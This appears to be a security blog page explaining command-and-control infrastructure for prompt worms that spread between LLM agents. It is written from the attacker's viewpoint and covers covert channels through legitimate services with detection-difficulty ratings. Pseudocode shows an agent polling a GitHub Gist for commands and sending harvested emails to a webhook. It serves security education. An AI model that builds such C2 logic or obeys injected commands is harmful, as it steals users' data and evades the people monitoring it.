30.4.5 Command and control (C&C) infrastructure

2025.10.06.
AI Security Blog

A self-replicating prompt worm is a potent threat, but its capabilities are magnified exponentially when it can be directed. A Command and Control (C&C or C2) infrastructure transforms an autonomous, chaotic threat into a coordinated, steerable botnet of compromised AI agents. It provides the attacker with a mechanism to issue commands, update payloads, and exfiltrate data from the entire infected population.

The Role of C&C in Prompt Worms

In traditional malware, the C&C server is the brain of the operation. For prompt worms, this concept adapts to the unique environment of LLM-integrated systems. Instead of controlling operating systems, you are controlling language model instances and their access to data and tools. A C&C infrastructure for a prompt worm serves several critical functions:

Kapcsolati űrlap - EN

Do you have a question about AI Security? Reach out to us here:

  • Dynamic Payload Management: The initial worm might only be designed to spread. The C&C allows you to deliver new instructions, changing the worm’s objective from replication to data exfiltration, denial of service, or targeted manipulation.
  • Data Exfiltration Hub: Stolen data needs a destination. The C&C server acts as a centralized collection point for sensitive information harvested by the worm from various infected systems.
  • Campaign Orchestration: You can direct the botnet’s activities. You might instruct worms to remain dormant to avoid detection, activate on a specific date, or target users matching a certain profile (e.g., “system administrators”).
  • Intelligence Gathering: The C&C receives feedback (beacons) from infected agents, providing telemetry on the worm’s spread, the types of systems infected, and the success rate of its operations.

Architectural Models for Covert Communication

The primary challenge in designing a C&C architecture for a prompt worm is evading detection. Network traffic from an AI application to an unknown, suspicious server is a major red flag. Therefore, attackers often leverage legitimate services to mask their communications.

Centralized vs. Decentralized Models

Like traditional botnets, prompt worm C&C can follow two main paradigms. A centralized model uses a single server (or a small cluster) that all infected agents report to. It’s simple to manage but represents a single point of failure that defenders can block.

A decentralized, or peer-to-peer (P2P), model is more resilient. Infected agents communicate with each other to relay commands and data, making it much harder to decapitate the network. However, this approach is significantly more complex to implement within the constraints of a prompt.

Centralized C&C C&C Agent Agent Agent Decentralized (P2P) C&C Agent Agent Agent Agent

Living Off the Land: C&C via Legitimate Services

The most sophisticated approach is to use trusted, high-reputation web services as communication channels. This technique, often called “Living Off the Land,” makes C&C traffic nearly indistinguishable from normal application behavior, as it doesn’t require direct communication with an attacker-controlled server.

Service Type Example Services C&C Mechanism Detection Difficulty
Code/Text Hosting GitHub Gists, Pastebin The worm periodically fetches a specific URL. The attacker updates the content of the gist/paste to issue new commands. High. Outbound requests to these services are common for developers and some applications.
Messaging Platforms Discord Webhooks, Slack APIs, Telegram Bots The worm sends exfiltrated data as messages to a private channel/chat via a webhook or API. Commands can be posted in the channel for the worm to read. High. Traffic is encrypted and directed to a legitimate, trusted domain. Requires inspection of API usage patterns.
Cloud Storage/Docs Google Sheets, Dropbox, OneDrive Data is exfiltrated by writing to a specific cell in a shared sheet or uploading a file. Commands are read from another part of the same document. Very High. Requires auditing API calls and access patterns to specific documents, which is challenging at scale.
Social Media Twitter, Reddit Commands are encoded in posts from a specific account (e.g., in a specific format or hidden in image metadata). Data can be exfiltrated via direct messages. Medium. Can be flagged by anomaly detection if the AI agent doesn’t normally interact with social media APIs.

Example C&C Communication Logic

Imagine a worm capable of using an external tool (e.g., a web request function). Its C&C logic, embedded within its prompt, might follow a simple loop. The following pseudocode illustrates how a worm could fetch and execute commands from a GitHub Gist.

# Pseudocode for a worm's C&C logic
C2_URL = "https://api.github.com/gists/UNIQUE_GIST_ID"
AGENT_ID = generate_unique_id()

function contact_c2():
    # Fetch the raw content of the Gist
    response = http_get(C2_URL)
    command_data = parse_json(response.content)

    # Extract command for this agent or all agents
    command = command_data.get("*") or command_data.get(AGENT_ID)
    
    if command:
        execute_command(command)
    else:
        # Default behavior: replicate
        replicate_self()

function execute_command(cmd):
    if cmd['action'] == 'exfiltrate_email':
        email_content = find_latest_email()
        send_data_to_webhook(cmd['target_url'], email_content)
    elif cmd['action'] == 'go_dormant':
        wait(cmd['duration'])

In this model, the attacker simply needs to update a JSON file in a public Gist to control the entire botnet. The worm’s prompt would instruct the LLM to execute this logic, using its available tools to make the web request and process the response. This hands-off, asynchronous control method is powerful and difficult to trace back to the attacker.